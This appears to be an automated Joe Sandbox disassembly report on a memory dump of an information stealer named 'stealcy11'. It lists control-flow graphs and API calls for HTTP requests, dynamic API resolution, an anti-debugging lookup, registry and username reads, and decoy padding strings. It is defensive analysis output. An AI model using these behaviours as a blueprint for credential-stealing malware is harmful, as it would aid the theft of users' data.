call 8e2930 call 907340 call 9072b0 call 8e2930 call 907340 call 9072b0 call 8e2930 call 907340 call 9072b0 call 8e2930 call 907340 call 9072b0 call 8e2930 call 9072f0 call 9072b0 call 8e2930 call 907340 call 9072b0 call 8e2930 call 907340 call 9072b0 call 8e2930 call 9072f0 call 9072b0 call 8e2930 call 907340 call 9072b0 call 8e2930 call 907340 call 9072b0 call 8e2930 call 907340 call 9072b0 call 8e2930 call 907340 call 9072b0 call 8e2930 call 907340 call 9072b0 call 8e2930 call 907340 call 9072b0 call 8e2930 call 907340 call 9072b0 call 8e2930 call 9072f0 call 9072b0 call 8e2930 call 907340 call 9072b0 call 8e2930 call 907340 call 9072b0 call 8e2930 call 907340 call 9072b0 call 8e2930 call 907340 call 9072b0 call 8e2930 lstrlenA * 2 GetProcessHeap HeapAlloc lstrlenA memcpy lstrlenA memcpy lstrlenA * 2 memcpy lstrlenA HttpSendRequestA InternetReadFile 1627->1628 1629 8e5f27-8e5f28 InternetCloseHandle 1627->1629 1762 8e5f1a-8e5f24 InternetCloseHandle 1628->1762 1763 8e5e6a 1628->1763 1629->1626 1762->1629 1764 8e5e70-8e5e75 1763->1764 1764->1762 1765 8e5e7b-8e5ea4 lstrlenA call 8e2840 1764->1765 1768 8e5ea6-8e5eaa 1765->1768 1769 8e5ec2-8e5ec9 1765->1769 1768->1769 1770 8e5eac-8e5ebc lstrcpy lstrcatA 1768->1770 1771 8e5ecb-8e5ed0 call 8e2930 1769->1771 1772 8e5ed6-8e5ee3 call 8e2840 1769->1772 1770->1769 1771->1772 1777 8e5ee5-8e5ee7 1772->1777 1778 8e5ef1-8e5f14 call 8e2930 InternetReadFile 1772->1778 1777->1778 1779 8e5ee9-8e5eeb lstrcpy 1777->1779 1778->1762 1778->1764 1779->1778
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,?), ref: 008E56EF
                                  • lstrlenA.KERNEL32(?), ref: 008E5742
                                  • lstrcpy.KERNEL32(00000000,0090D014), ref: 008E5784
                                  • lstrcpy.KERNEL32(00000000,0090D014), ref: 008E57C3
                                  • lstrcpy.KERNEL32(00000000,0090D014), ref: 008E57F3
                                  • lstrcpy.KERNEL32(00000000,0090D014), ref: 008E5828
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID: ------$"$--$------
                                  • API String ID: 367037083-1406108388
                                  • Opcode ID: 37f2801e25dee3c4c1f79befccc628394c0ecd4c01d16ef96ba0ba8b28a42e02
                                  • Instruction ID: c996238f9c8e91e364bc124ee015fd3e031eb263dfbdf2029869d2797499723f
                                  • Opcode Fuzzy Hash: 37f2801e25dee3c4c1f79befccc628394c0ecd4c01d16ef96ba0ba8b28a42e02
                                  • Instruction Fuzzy Hash: 28426A31E006999FCB10EBB9CC45AAFBBB9FF49314F054424BA05E7252DE74AD028BD1

                                  Control-flow Graph

                                  APIs
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 008E4994
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 008E499B
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 008E49A2
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 008E49A9
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 008E49B0
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 008E49BB
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 008E49C2
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 008E49D2
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 008E49D9
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 008E49E0
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 008E49E7
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 008E49EE
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 008E49F9
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 008E4A00
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 008E4A07
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 008E4A0E
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 008E4A15
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 008E4A2B
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 008E4A32
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 008E4A39
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 008E4A40
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 008E4A47
                                  • strlen.MSVCRT ref: 008E4A4F
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 008E4A73
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 008E4A7A
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 008E4A81
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 008E4A88
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 008E4A8F
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 008E4A9F
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 008E4AA6
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 008E4AAD
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 008E4AB4
                                  • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 008E4ABB
                                  • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 008E4AD0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                  • API String ID: 2127927946-3329630956
                                  • Opcode ID: 8e69d7020359eff6a88df4a5702e101eb965f10de65de9616fab4be6f77c8d33
                                  • Instruction ID: d5ca50208b36be819637ef61c29e0985d89a19d9e88b3ce8597fea8b5034395a
                                  • Opcode Fuzzy Hash: 8e69d7020359eff6a88df4a5702e101eb965f10de65de9616fab4be6f77c8d33
                                  • Instruction Fuzzy Hash: 0131F6A0F8432C7ED6206FA67C8A9DF7E54DFCC768B704052F51856388C9A06486CEE2

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1786 9063c0-9063ed GetPEB 1787 9065f3-906653 LoadLibraryA * 5 1786->1787 1788 9063f3-9065ee call 906320 GetProcAddress * 20 1786->1788 1789 906655-906663 GetProcAddress 1787->1789 1790 906668-90666f 1787->1790 1788->1787 1789->1790 1792 906671-906697 GetProcAddress * 2 1790->1792 1793 90669c-9066a3 1790->1793 1792->1793 1795 9066a5-9066b3 GetProcAddress 1793->1795 1796 9066b8-9066bf 1793->1796 1795->1796 1798 9066c1-9066cf GetProcAddress 1796->1798 1799 9066d4-9066db 1796->1799 1798->1799 1800 906707-90670a 1799->1800 1801 9066dd-906702 GetProcAddress * 2 1799->1801 1801->1800
                                  APIs
                                  • GetProcAddress.KERNEL32(76F70000,010C37F8), ref: 00906419
                                  • GetProcAddress.KERNEL32(76F70000,010C3828), ref: 00906432
                                  • GetProcAddress.KERNEL32(76F70000,010C38D0), ref: 0090644A
                                  • GetProcAddress.KERNEL32(76F70000,010C3900), ref: 00906462
                                  • GetProcAddress.KERNEL32(76F70000,010C1450), ref: 0090647B
                                  • GetProcAddress.KERNEL32(76F70000,010BABD0), ref: 00906493
                                  • GetProcAddress.KERNEL32(76F70000,010BAD10), ref: 009064AB
                                  • GetProcAddress.KERNEL32(76F70000,010C3978), ref: 009064C4
                                  • GetProcAddress.KERNEL32(76F70000,010C3918), ref: 009064DC
                                  • GetProcAddress.KERNEL32(76F70000,010C3A50), ref: 009064F4
                                  • GetProcAddress.KERNEL32(76F70000,010C3930), ref: 0090650D
                                  • GetProcAddress.KERNEL32(76F70000,010BAD30), ref: 00906525
                                  • GetProcAddress.KERNEL32(76F70000,010C39D8), ref: 0090653D
                                  • GetProcAddress.KERNEL32(76F70000,010C39F0), ref: 00906556
                                  • GetProcAddress.KERNEL32(76F70000,010BADB0), ref: 0090656E
                                  • GetProcAddress.KERNEL32(76F70000,010C3A20), ref: 00906586
                                  • GetProcAddress.KERNEL32(76F70000,010C3A38), ref: 0090659F
                                  • GetProcAddress.KERNEL32(76F70000,010BAB50), ref: 009065B7
                                  • GetProcAddress.KERNEL32(76F70000,010C3B28), ref: 009065CF
                                  • GetProcAddress.KERNEL32(76F70000,010BAEB0), ref: 009065E8
                                  • LoadLibraryA.KERNEL32(010C3B40,?,?,?,00901BE3), ref: 009065F9
                                  • LoadLibraryA.KERNEL32(010C3AE0,?,?,?,00901BE3), ref: 0090660B
                                  • LoadLibraryA.KERNEL32(010C3AF8,?,?,?,00901BE3), ref: 0090661D
                                  • LoadLibraryA.KERNEL32(010C3B10,?,?,?,00901BE3), ref: 0090662E
                                  • LoadLibraryA.KERNEL32(010C3BA0,?,?,?,00901BE3), ref: 00906640
                                  • GetProcAddress.KERNEL32(76DA0000,010C3B70), ref: 0090665D
                                  • GetProcAddress.KERNEL32(75840000,010C3B88), ref: 00906679
                                  • GetProcAddress.KERNEL32(75840000,010C3B58), ref: 00906691
                                  • GetProcAddress.KERNEL32(753A0000,010C2840), ref: 009066AD
                                  • GetProcAddress.KERNEL32(77300000,010BAD50), ref: 009066C9
                                  • GetProcAddress.KERNEL32(774D0000,010C28A0), ref: 009066E5
                                  • GetProcAddress.KERNEL32(774D0000,NtQueryInformationProcess), ref: 009066FC
                                  Strings
                                  • NtQueryInformationProcess, xrefs: 009066F1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: NtQueryInformationProcess
                                  • API String ID: 2238633743-2781105232
                                  • Opcode ID: 32d553d284626162254c2f0560797e0ba34624c81e69564bbd0fb9f724df2364
                                  • Instruction ID: 4ba1106f571d152a7ab1dc837b46ca606242ccffbdb3b3b9aa2656d52b95e4c1
                                  • Opcode Fuzzy Hash: 32d553d284626162254c2f0560797e0ba34624c81e69564bbd0fb9f724df2364
                                  • Instruction Fuzzy Hash: 32A14FB5A11280EFD754DF64EDACAA63BB9F78C641380C929E916C3364DF34A901DF60

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1962 8e5570-8e55cf GetProcessHeap RtlAllocateHeap InternetOpenA InternetOpenUrlA 1963 8e5627-8e563d InternetCloseHandle * 2 1962->1963 1964 8e55d1-8e55d2 1962->1964 1966 8e563f-8e564d 1963->1966 1967 8e56a7-8e56b1 1963->1967 1965 8e55d8-8e55f7 InternetReadFile 1964->1965 1968 8e55f9 1965->1968 1969 8e5623-8e5626 1965->1969 1970 8e564f-8e5652 1966->1970 1971 8e5677-8e567c 1966->1971 1973 8e5600-8e561d LdrInitializeThunk 1968->1973 1969->1963 1970->1971 1974 8e5654-8e565a 1970->1974 1971->1967 1972 8e567e-8e5681 1971->1972 1972->1967 1975 8e5683-8e5689 1972->1975 1973->1973 1976 8e561f-8e5621 1973->1976 1977 8e565c 1974->1977 1978 8e5661-8e5672 1974->1978 1979 8e568b 1975->1979 1980 8e5691-8e56a2 1975->1980 1976->1965 1976->1969 1977->1978 1978->1971 1981 8e5674 1978->1981 1979->1980 1980->1967 1982 8e56a4 1980->1982 1981->1971 1982->1967
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 008E5589
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 008E5590
                                  • InternetOpenA.WININET(0090D014,00000000,00000000,00000000,00000000), ref: 008E55A6
                                  • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,04000100,00000000), ref: 008E55C1
                                  • InternetReadFile.WININET(?,?,00000400,00000001), ref: 008E55EC
                                  • LdrInitializeThunk.NTDLL(00000000,?,00000001), ref: 008E5611
                                  • InternetCloseHandle.WININET(?), ref: 008E562B
                                  • InternetCloseHandle.WININET(00000000), ref: 008E5632
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHeapOpen$AllocateFileInitializeProcessReadThunk
                                  • String ID:
                                  • API String ID: 1621142662-0
                                  • Opcode ID: 7d924ab8ad9f8eab5da018a747ee4137469d2a88cb09ed65d6f0ac97a8f94886
                                  • Instruction ID: 8f5d54bf73bb7a451029e1a8ead6c4382750dab205e9a9033a5498e0345c1fe2
                                  • Opcode Fuzzy Hash: 7d924ab8ad9f8eab5da018a747ee4137469d2a88cb09ed65d6f0ac97a8f94886
                                  • Instruction Fuzzy Hash: E2417C70A00244AFDB14CF56CC48F9AB7B4FF49708F54C0A9E908DB2A1DB719941CF94

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2040 9028b0-9028f3 GetProcessHeap HeapAlloc RegOpenKeyExA 2041 9028f5-902905 RegQueryValueExA 2040->2041 2042 90290b-90291e RegCloseKey 2040->2042 2041->2042 2043 902920-90292f 2042->2043 2044 902931-902934 2042->2044 2043->2043 2043->2044
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 009028C5
                                  • HeapAlloc.KERNEL32(00000000), ref: 009028CC
                                  • RegOpenKeyExA.KERNEL32(80000002,010CA508,00000000,00020119,00902849), ref: 009028EB
                                  • RegQueryValueExA.KERNEL32(00902849,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00902905
                                  • RegCloseKey.ADVAPI32(00902849), ref: 0090290F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000923000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000092B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000951000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000960000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000973000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009D9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.00000000009E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A02000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A3D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000A60000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000B18000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1847465653.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_8e0000_stealcy11.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocCloseOpenProcessQueryValue
                                  • String ID: CurrentBuildNumber
                                  • API String ID: 3466090806-1022791448
                                  • Opcode ID: 9f8254e22826c392b06236dcbeba432fca54317f7ae4742e768aeb62f382e8d5
                                  • Instruction ID: b5d6ba2c4ae5df99a1de64cf97f8f43ff7b5bdf2453c783d0b289b292ac6d498
                                  • Opcode Fuzzy Hash: 9f8254e22826c392b06236dcbeba432fca54317f7ae4742e768aeb62f382e8d5
                                  • Instruction Fuzzy Hash: 7B01D475A00258AFE310CBA0DC5DFFB7BBCEB49745F604058FE45D7280EA315A058790
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,00000000), ref: 00902A0F
                                  • HeapAlloc.KERNEL32(00000000), ref: 00902A16
                                  • GetUserNameA.ADVAPI32(00000000,00000104), ref: 00902A2A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1846899554.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                  • Associated: 00000000.00000002.1846876474.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846931588.000000000090B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846954653.0000000000917000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1846976400.0000000000918000.00000004.00000001.01000000.00000003.sdmpDownload File
